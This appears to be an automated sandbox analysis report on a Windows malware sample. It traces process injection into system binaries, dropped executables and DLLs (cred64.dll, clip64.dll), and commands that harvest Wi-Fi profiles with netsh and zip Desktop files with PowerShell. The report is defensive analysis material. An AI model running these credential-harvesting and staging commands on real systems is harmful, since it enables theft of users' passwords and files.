Source: C:\Windows\System32\msiexec.exe	Code function: 9_2_00007FF7179D40E4 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,OpenProcess,WaitForSingleObject,CloseHandle,	9_2_00007FF7179D40E4

Source: C:\Users\user\Desktop\yINR7uQlPr.exe

Code function: 0_2_00007FF79E383E24 CreateToolhelp32Snapshot,Process32FirstW,CloseHandle,wcscmp,OpenProcess,TerminateProcess,CloseHandle,Process32NextW,CloseHandle,

0_2_00007FF79E383E24

Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Code function: 20_2_007AE8D0 GetUserNameA,CoInitialize,CoCreateInstance,CoUninitialize,CoUninitialize,CoUninitialize,CoUninitialize,

20_2_007AE8D0

Source: C:\Users\user\Desktop\yINR7uQlPr.exe

File created: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942

Jump to behavior

Source: C:\Windows\System32\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\worker_RdDwvE
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6980:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5808:120:WilError_03
Source: C:\Windows\System32\audiodg.exe	Mutant created: \Sessions\1\BaseNamedObjects\worker_kBEqZh
Source: C:\Windows\System32\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\worker_BAccdq
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Mutant created: \Sessions\1\BaseNamedObjects\43266f2abbf198987ad62d4962cf7134
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2412:120:WilError_03
Source: C:\Windows\System32\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\GqgWzd
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5252:120:WilError_03

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Local\Temp\CC11.tmp

Jump to behavior

Source: yINR7uQlPr.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'

Source: C:\Windows\explorer.exe

File read: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\yINR7uQlPr.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main

Source: rundll32.exe, 00000016.00000002.2679991024.000001ED56728000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000018.00000002.2689505871.000001C0C6B48000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: yINR7uQlPr.exe	Virustotal: Detection: 40%
Source: yINR7uQlPr.exe	ReversingLabs: Detection: 75%

Source: EC2F.tmp.gfx.exe	String found in binary or memory: " /add
Source: EC2F.tmp.gfx.exe	String found in binary or memory: " /add /y
Source: Gxtuum.exe	String found in binary or memory: " /add
Source: Gxtuum.exe	String found in binary or memory: " /add /y
Source: Gxtuum.exe	String found in binary or memory: " /add
Source: Gxtuum.exe	String found in binary or memory: " /add /y

Source: C:\Users\user\Desktop\yINR7uQlPr.exe

File read: C:\Users\user\Desktop\yINR7uQlPr.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\yINR7uQlPr.exe "C:\Users\user\Desktop\yINR7uQlPr.exe"
Source: C:\Users\user\Desktop\yINR7uQlPr.exe	Process created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"
Source: C:\Users\user\Desktop\yINR7uQlPr.exe	Process created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"
Source: C:\Users\user\Desktop\yINR7uQlPr.exe	Process created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe "C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe"
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Process created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Process created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Process created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe "C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe "C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe"
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Process created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Process created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Process created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Process created: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe "C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe "C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe "C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe"
Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe	Process created: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe "C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\netsh.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\netsh.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\clip64.dll, Main
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\clip64.dll, Main
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Process created: C:\Users\user\AppData\Local\Temp\10000820101\update.exe "C:\Users\user\AppData\Local\Temp\10000820101\update.exe"
Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exe	Process created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"
Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exe	Process created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"
Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exe	Process created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Process created: C:\Users\user\AppData\Local\Temp\10000830101\update.exe "C:\Users\user\AppData\Local\Temp\10000830101\update.exe"
Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exe	Process created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"
Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exe	Process created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"
Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exe	Process created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Process created: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe "C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe"
Source: C:\Users\user\Desktop\yINR7uQlPr.exe	Process created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"	Jump to behavior
Source: C:\Users\user\Desktop\yINR7uQlPr.exe	Process created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"	Jump to behavior
Source: C:\Users\user\Desktop\yINR7uQlPr.exe	Process created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe "C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe "C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe "C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe "C:\Users\user\AppData\Local\Temp\D7AB.tmp.ssg.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe "C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Process created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Process created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Process created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Process created: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe "C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Process created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Process created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Process created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe	Process created: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe "C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe"
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\clip64.dll, Main
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\clip64.dll, Main
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Process created: C:\Users\user\AppData\Local\Temp\10000820101\update.exe "C:\Users\user\AppData\Local\Temp\10000820101\update.exe"
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Process created: C:\Users\user\AppData\Local\Temp\10000830101\update.exe "C:\Users\user\AppData\Local\Temp\10000830101\update.exe"
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Process created: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe "C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe"
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exe	Process created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"
Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exe	Process created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"
Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exe	Process created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"
Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exe	Process created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"
Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exe	Process created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"
Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exe	Process created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"

Source: C:\Users\user\Desktop\yINR7uQlPr.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\yINR7uQlPr.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\yINR7uQlPr.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\yINR7uQlPr.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\yINR7uQlPr.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\yINR7uQlPr.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\yINR7uQlPr.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\yINR7uQlPr.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\yINR7uQlPr.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\audiodg.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\audiodg.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\audiodg.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\audiodg.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\audiodg.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\audiodg.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\audiodg.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.cloudstore.schema.shell.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: workfoldersshell.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: mfsrcsnk.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\audiodg.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\audiodg.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\audiodg.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\audiodg.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\audiodg.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\audiodg.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\audiodg.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\audiodg.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\audiodg.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\audiodg.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Section loaded: cryptbase.dll	Jump to behavior
